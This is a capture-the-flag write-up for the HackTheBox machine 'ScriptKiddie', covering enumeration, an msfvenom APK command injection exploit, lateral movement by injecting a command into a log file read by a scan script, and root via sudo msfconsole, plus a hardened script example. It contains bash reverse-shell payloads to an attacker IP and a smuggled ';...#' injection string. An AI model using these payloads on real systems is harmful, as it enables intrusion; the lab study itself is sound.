HackTheBox — ScriptKiddie

As always, we start with nmap to discover open ports/services.

Nmap scan

nmap -sC -sV -oA scriptkiddie 10.10.10.234

We have two open ports: 22/ssh and 5000/http. Let's enumerate the HTTP port.

HTTP Enumeration

Visiting 10.10.10.226:5000 we see that the web application uses three tools (Nmap, MSFVenom, Searchsploit).

The first thing I tried was injecting OS commands in each field, but nothing worked. Next I did some googling for public exploits for these tools and found an APK template command injection vulnerability in MSFVenom.

There’s a module in Metasploit that exploits this vulnerability, but let's use this Python script from Exploit-DB instead.

Exploit: https://www.exploit-db.com/exploits/49491

We need to edit the payload variable in the script first.

payload = 'bash -c "/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1"' 

Initial Foothold/User

Now let's run our netcat listener and run the exploit.

And we are on the box as the kid user.

Lateral Movement

After some enumeration I found a script called scanlosers.sh inside the pwn user's home directory. We only have read permissions on it, but I think the script is running regularly because the hackers file is cleared every few minutes. So let's understand the script to see how it works.

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

It reads the hackers file inside our home directory, splits each line on spaces, takes everything from the third field onward (which is the IP address), and runs an Nmap scan on it. The value is placed directly into the sh -c command string without any validation.

We have read/write permissions on the hackers file, so we can edit it to get OS command injection.

Payload: echo "field1 field2 ;bash -c '/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1' #" > hackers

field1 and field2 are just placeholders for the cut command so that our payload lands in the third field. The “;” breaks out of the sh command and the “#” comments out the rest of the command.

The final step is to run a netcat listener and receive the reverse shell: nc -nvlp 1337
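From the defender's side, the flaw in scanlosers.sh is that a field from a file the kid user can write is spliced into an sh -c string; the sketch below is an added example (not the box's script and not part of the original write-up) that validates the field as an IPv4 address and passes it to nmap as a single argument. The function names and the sample log lines are constructed for illustration, and the log format (two leading fields, then the address) is assumed from the description above.

```shell
#!/bin/sh
# Added example: hardened handling of the log field; not the box's own script.

# Succeeds only for a strict dotted-quad IPv4 address.
is_valid_ipv4() (
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) exit 1 ;;  # digits and single dots only
    esac
    IFS=.
    set -- $1                               # split into octets (no glob chars left)
    [ "$#" -eq 4 ] || exit 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || exit 1
    done
)

# Print the unique, validated targets from a log file; note rejects on stderr.
# Uses -f3 (field 3 only) instead of the original -f3- (field 3 to end of line).
valid_targets() {
    cut -d' ' -f3 < "$1" | sort -u | while IFS= read -r ip; do
        if is_valid_ipv4 "$ip"; then
            printf '%s\n' "$ip"
        else
            printf 'rejected log entry\n' >&2
        fi
    done
}

# Run the scan with the address as one argv element. No "sh -c" string is
# built, so nothing from the log is ever re-parsed as shell syntax.
scan_target() {
    nmap --top-ports 10 -oN "recon/$1.nmap" "$1" >/dev/null 2>&1
}

# Constructed sample log for the demo (not data from the box).
write_sample_log() {
    printf '%s\n' \
        '[2021-01-01 10:00:00] 10.10.14.7' \
        '[2021-01-01 10:00:05] 10.10.14.7' \
        '[2021-01-01 10:00:09] ;echo injected #' \
        '[2021-01-01 10:00:12] 999.1.1.1' \
        '[2021-01-01 10:00:15] 192.168.1.20 extra' > "$1"
}

log=$(mktemp)
write_sample_log "$log"
valid_targets "$log"    # prints 10.10.14.7 and 192.168.1.20 only
rm -f "$log"
```

In a real job, each address printed by valid_targets would be handed to scan_target.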

Getting root

Running sudo -l shows that we can run Metasploit’s msfconsole as root without a password.

Metasploit’s msfconsole allows you to execute system commands within msfconsole itself.

sudo /opt/metasploit-framework-6-0-9/msfconsole

And we are root!


I am a Penetration Testing Enthusiast with a computer science background, also interested in CTFs and Python scripting.